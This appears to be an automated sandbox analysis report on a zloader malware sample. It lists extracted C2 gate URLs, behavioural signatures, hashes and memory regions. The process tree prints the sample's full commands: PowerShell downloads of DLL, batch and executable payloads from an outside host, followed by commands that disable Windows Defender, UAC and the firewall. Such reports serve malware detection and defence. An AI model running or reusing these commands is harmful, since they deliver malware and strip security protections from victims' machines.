Analysis
-
max time kernel
71s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
13-08-2021 06:43
Static task
static1
Behavioral task
behavioral1
Sample
2d4358c9390a9586c2e262ebcec37535.exe
Resource
win7v20210408
General
-
Target
2d4358c9390a9586c2e262ebcec37535.exe
-
Size
165KB
-
MD5
2d4358c9390a9586c2e262ebcec37535
-
SHA1
36aad53c5bd366bb037da9e5a2569352a56d2df7
-
SHA256
0f527546d025e3705bdbba6eb98226373a8b8368bd1d2915a5f195541566d11e
-
SHA512
6367cea3f505eaaf588af49089d48486385dba77de7821c03f9ff6707bc47bffaa4cb3021999657b4effd633c52e3d46ae6231e026e6ac3b23c3853bf6b31429
Malware Config
Extracted
zloader
vasja
vasja
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 2040 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1216 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
2d4358c9390a9586c2e262ebcec37535.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 2d4358c9390a9586c2e262ebcec37535.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 2d4358c9390a9586c2e262ebcec37535.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2040 powershell.exe 2040 powershell.exe 2040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2040 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
2d4358c9390a9586c2e262ebcec37535.execmd.exeregsvr32.exedescription pid process target process PID 3908 wrote to memory of 808 3908 2d4358c9390a9586c2e262ebcec37535.exe cmd.exe PID 3908 wrote to memory of 808 3908 2d4358c9390a9586c2e262ebcec37535.exe cmd.exe PID 808 wrote to memory of 2040 808 cmd.exe powershell.exe PID 808 wrote to memory of 2040 808 cmd.exe powershell.exe PID 808 wrote to memory of 3832 808 cmd.exe regsvr32.exe PID 808 wrote to memory of 3832 808 cmd.exe regsvr32.exe PID 3832 wrote to memory of 1216 3832 regsvr32.exe regsvr32.exe PID 3832 wrote to memory of 1216 3832 regsvr32.exe regsvr32.exe PID 3832 wrote to memory of 1216 3832 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d4358c9390a9586c2e262ebcec37535.exe"C:\Users\Admin\AppData\Local\Temp\2d4358c9390a9586c2e262ebcec37535.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\regsvr32.exeregsvr32 JavaE.dll3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeJavaE.dll4⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat3⤵
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe4⤵
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T sc config WinDefend start= disabled4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
-
C:\Windows\system32\shutdown.exeshutdown.exe /r /f /t 004⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
56efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0d5329a501d2e7b9d57efb4fe96b3550
SHA1bf815e8bda2ecdc2406233d56474c8f6850be415
SHA256bcefb1aa2448ef0221ad2c0690b9110865cb16166d3db1cf13795342d15e2fa2
SHA51271e18b04591a140c3f0c3029c57337ca632556e8c21ccb90af275fcbf125a16c1cfe7941ad9c8ec5ffcf717e69cb3748f05eacc2e38b0eaed0202c35f4440171
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0f67736768d5ac70e1e4fb7958d8513a
SHA11a4229f0086cd88406fb6bc078b0061482b41fa8
SHA256d2567dc3d057cd8e153084f95e61d93f81b60a894acafd04679db2c1e1bc2c01
SHA512509307ea02d761443f7018d424d9fdbdde2a01c8e0eeeb7f5b02fbaef2e4cdb1c0b9eb34132487a8bff67378aa11cdf6775932c7ce00c0d5ad31915d5e882558
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
82920c93c0a75defc6a32001706c43bd
SHA160755fb5fa1e0cbd4df86c3ab9aab0f33f0e9761
SHA2562af7dfd49b2b797e6a5bd8168d0a50ea0aefbb0fb717138262d477c137cace6e
SHA512a88174e164ad22ee7a176aeb4f6828c5d31a419fa8960e3bb33d991348933bf7ac19ab2aa3f403f1eb9122fc480982ae7bd23d33e42d3f57f5ebc3c4aed6b352
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d2a0b2b105e95e5c5b31173450447de6
SHA1e88ecdbb20c35d4d93124fbc921c1bd914461ae5
SHA256a8c90af8991444750fe3f8f1ebbef4c2a458d693d885b9740cb02273e7142f87
SHA5120e5023eea51599f448b849532adcd0255582da11e8dd06e7cd86dcfb7a03eb176acb3bbacc912052319b999a4b914e745c653bba10e8952cb98e4efe019fb707
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
6810fbcec058a93cb9c9c7611fc72102
SHA18cc1f8c2c5b1e47cd126851073204dc10cc2a17b
SHA256c3cb6c450159457d99c3f50a40a9a8cc6a3dd882335e91809a294bd48c880197
SHA512a56e9c355191bb312ba1f78cd4ab002e9f9283d2e0ea0203d5a225dd8d6730c4f641c98f656eaea3b666ff8c4f1a544a1da6a9821aeb8e4cf63bd25197e1e4ec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9ac308ff715de32ba52b8f39a0379d4c
SHA14c6797c14eaba3cdde2f9977f60482d4d8ce8ccd
SHA256e82287a93bd80a0878081fea260488255503aef5b9ac417ca0634d37e4eb5eba
SHA51258ac5b3e62fa57bc2e6cdb8be9d86a953f70f818547dc87faffdc15cdd5a57d058009671658f49f93869a7f32f5f20fb63bcc68b8acbe1e4e05c90915579ba5d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
5d17194079ef42ea12d29119a529c187
SHA1f696d21628217d4bd431622eec3c40a459c9f07e
SHA2564e950aa7abd3073fb1b87923ad4cb08d6794cd589d2566a0535ac2f4174d7fd6
SHA512467e60f980c852f82a3fb786173d2129070cbe0b54bbf0791092292d3e5c455009789b74e300589acf02a721c581a1577134013cd7527833c1cfed0268615310
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
27378328d0a3f2dda51c33d588e33075
SHA1948e889901fd85c6d513be48db3b33c2e0e9f86f
SHA2560c48ba668f3d2ff0de1f5788ac53759b058e599694ce835c6238ed7d68ebaebb
SHA512fcfe87b3ae9ad7f13386ca21390dbe002c698c47ea77c2002245a945e85f211a1613a36e69c32bc63ac6ab153a1f42d2c323073802ba51c606ab3669d18cc2db
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
ce1db3e55d65db7d027d0f873e3b72fc
SHA1267ce8b309889795964ca0b8b344a914fdc43b64
SHA256318f65d1bb63c732dbeabe73c3781c920e54958eb25883bcf79610c5f0f31a79
SHA51299fb9b4f17880edec83adaf73841b674f359491b13990ef03c68d9cea74fc06f79d3e5f2a38a738652112da20b84186dc5bf5a29a3e08839bae327f7c98bdaa3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
cce5f4329168e9f882f00494b577cb3f
SHA1070ca7c19aa9dc302df13bf289aa09f5ab68ff03
SHA25652435fb56f4f849f46550bb551a4a64895ed50e588d092ad5139063e39035203
SHA512e589c891c9ebec1574f144c34ae25ed4df33cbc0be96670d095fad5d0477829d1562409b7da02d2d6d29c18ecbf715a00c2d7c380947ff732f7c19c8515f5043
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
bee74ec8105e14eb278449973ea950ee
SHA144fdf6460eb0357aed75e494a62bf9e5fec716ff
SHA2563192812f8f68f9f5da22e0ae94ea2a7598db311b285c8019791e6d0e11314a15
SHA51291a98bd51705857f9ceba73df9bb05c00bda931f10d42a92cb0b88cd369a665dd3a194c6514aa7bb047ac24fa7532c24f5fe565c58f4a8c900929dcc6d19eec0
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.batMD5
67858651d8acf00e98997f3b2f418796
SHA142c88f704e9ef686e336647b94baa997fbe36b0c
SHA256d21b99d694f75386afb891753f4c4a4c023cd3ae23c452a9e35a440b1655fd96
SHA51204781fc2aba7fae039ebc70911da17de5b0175743ca4f78a8097c3468bbda895d67aafd59aef72b08887498c56c410926743ca9c112f674b73b065f5e48c7b89
-
C:\Users\Admin\AppData\Roaming\JavaE.dllMD5
a9dd9b9eff47af724436e2abdcd5ce6c
SHA11a9c9258f0345f5edddd933a7bd15ec42be51f8e
SHA256cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6
SHA51228af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52
-
C:\Users\Admin\AppData\Roaming\javase.exeMD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
C:\Users\Admin\AppData\Roaming\javase.exeMD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
\Users\Admin\AppData\Roaming\JavaE.dllMD5
a9dd9b9eff47af724436e2abdcd5ce6c
SHA11a9c9258f0345f5edddd933a7bd15ec42be51f8e
SHA256cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6
SHA51228af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52
-
memory/64-150-0x0000000000000000-mapping.dmp
-
memory/512-345-0x000001F5EC676000-0x000001F5EC678000-memory.dmpFilesize
8KB
-
memory/512-321-0x000001F5EC670000-0x000001F5EC672000-memory.dmpFilesize
8KB
-
memory/512-305-0x0000000000000000-mapping.dmp
-
memory/512-322-0x000001F5EC673000-0x000001F5EC675000-memory.dmpFilesize
8KB
-
memory/512-346-0x000001F5EC678000-0x000001F5EC679000-memory.dmpFilesize
4KB
-
memory/808-114-0x0000000000000000-mapping.dmp
-
memory/1008-450-0x0000020079B13000-0x0000020079B15000-memory.dmpFilesize
8KB
-
memory/1008-456-0x0000020079B16000-0x0000020079B18000-memory.dmpFilesize
8KB
-
memory/1008-447-0x0000020079B10000-0x0000020079B12000-memory.dmpFilesize
8KB
-
memory/1008-431-0x0000000000000000-mapping.dmp
-
memory/1216-144-0x0000000010000000-0x0000000010129000-memory.dmpFilesize
1.2MB
-
memory/1216-143-0x0000000000F30000-0x0000000000F31000-memory.dmpFilesize
4KB
-
memory/1216-141-0x0000000000000000-mapping.dmp
-
memory/1344-536-0x0000018BFB4A3000-0x0000018BFB4A5000-memory.dmpFilesize
8KB
-
memory/1344-540-0x0000018BFB4A6000-0x0000018BFB4A8000-memory.dmpFilesize
8KB
-
memory/1344-535-0x0000018BFB4A0000-0x0000018BFB4A2000-memory.dmpFilesize
8KB
-
memory/1344-521-0x0000000000000000-mapping.dmp
-
memory/1376-179-0x0000000000000000-mapping.dmp
-
memory/1940-166-0x000002527B970000-0x000002527B972000-memory.dmpFilesize
8KB
-
memory/1940-152-0x0000000000000000-mapping.dmp
-
memory/1940-168-0x000002527B973000-0x000002527B975000-memory.dmpFilesize
8KB
-
memory/1940-175-0x000002527B976000-0x000002527B978000-memory.dmpFilesize
8KB
-
memory/1972-218-0x0000020CD52B6000-0x0000020CD52B8000-memory.dmpFilesize
8KB
-
memory/1972-195-0x0000020CD52B3000-0x0000020CD52B5000-memory.dmpFilesize
8KB
-
memory/1972-194-0x0000020CD52B0000-0x0000020CD52B2000-memory.dmpFilesize
8KB
-
memory/1972-181-0x0000000000000000-mapping.dmp
-
memory/2040-134-0x000001A7845D6000-0x000001A7845D8000-memory.dmpFilesize
8KB
-
memory/2040-133-0x000001A7845D3000-0x000001A7845D5000-memory.dmpFilesize
8KB
-
memory/2040-132-0x000001A7845D0000-0x000001A7845D2000-memory.dmpFilesize
8KB
-
memory/2040-127-0x000001A79EC10000-0x000001A79EC11000-memory.dmpFilesize
4KB
-
memory/2040-122-0x000001A7845E0000-0x000001A7845E1000-memory.dmpFilesize
4KB
-
memory/2040-116-0x0000000000000000-mapping.dmp
-
memory/2140-275-0x00000195616A8000-0x00000195616A9000-memory.dmpFilesize
4KB
-
memory/2140-259-0x00000195616A6000-0x00000195616A8000-memory.dmpFilesize
8KB
-
memory/2140-230-0x00000195616A0000-0x00000195616A2000-memory.dmpFilesize
8KB
-
memory/2140-539-0x0000000000000000-mapping.dmp
-
memory/2140-232-0x00000195616A3000-0x00000195616A5000-memory.dmpFilesize
8KB
-
memory/2140-222-0x0000000000000000-mapping.dmp
-
memory/2232-277-0x000002E7F2890000-0x000002E7F2892000-memory.dmpFilesize
8KB
-
memory/2232-320-0x000002E7F2898000-0x000002E7F2899000-memory.dmpFilesize
4KB
-
memory/2232-263-0x0000000000000000-mapping.dmp
-
memory/2232-278-0x000002E7F2893000-0x000002E7F2895000-memory.dmpFilesize
8KB
-
memory/2232-301-0x000002E7F2896000-0x000002E7F2898000-memory.dmpFilesize
8KB
-
memory/2408-148-0x0000000000000000-mapping.dmp
-
memory/2580-424-0x0000020F4C086000-0x0000020F4C088000-memory.dmpFilesize
8KB
-
memory/2580-421-0x0000020F4C080000-0x0000020F4C082000-memory.dmpFilesize
8KB
-
memory/2580-432-0x0000020F4C088000-0x0000020F4C089000-memory.dmpFilesize
4KB
-
memory/2580-390-0x0000000000000000-mapping.dmp
-
memory/2580-422-0x0000020F4C083000-0x0000020F4C085000-memory.dmpFilesize
8KB
-
memory/2656-149-0x0000000000280000-0x00000000002A6000-memory.dmpFilesize
152KB
-
memory/2656-145-0x0000000000000000-mapping.dmp
-
memory/2664-348-0x0000000000000000-mapping.dmp
-
memory/2664-389-0x000001584D238000-0x000001584D239000-memory.dmpFilesize
4KB
-
memory/2664-387-0x000001584D236000-0x000001584D238000-memory.dmpFilesize
8KB
-
memory/2664-364-0x000001584D233000-0x000001584D235000-memory.dmpFilesize
8KB
-
memory/2664-363-0x000001584D230000-0x000001584D232000-memory.dmpFilesize
8KB
-
memory/2844-177-0x0000000000000000-mapping.dmp
-
memory/2896-537-0x0000000000000000-mapping.dmp
-
memory/3832-139-0x0000000000000000-mapping.dmp
-
memory/3856-493-0x000001C2C6456000-0x000001C2C6458000-memory.dmpFilesize
8KB
-
memory/3856-488-0x000001C2C6453000-0x000001C2C6455000-memory.dmpFilesize
8KB
-
memory/3856-486-0x000001C2C6450000-0x000001C2C6452000-memory.dmpFilesize
8KB
-
memory/3856-534-0x000001C2C6458000-0x000001C2C6459000-memory.dmpFilesize
4KB
-
memory/3856-476-0x0000000000000000-mapping.dmp
-
memory/3936-151-0x0000000000000000-mapping.dmp
-
memory/4056-484-0x000001B536C76000-0x000001B536C78000-memory.dmpFilesize
8KB
-
memory/4056-474-0x000001B536C73000-0x000001B536C75000-memory.dmpFilesize
8KB
-
memory/4056-473-0x000001B536C70000-0x000001B536C72000-memory.dmpFilesize
8KB
-
memory/4056-455-0x0000000000000000-mapping.dmp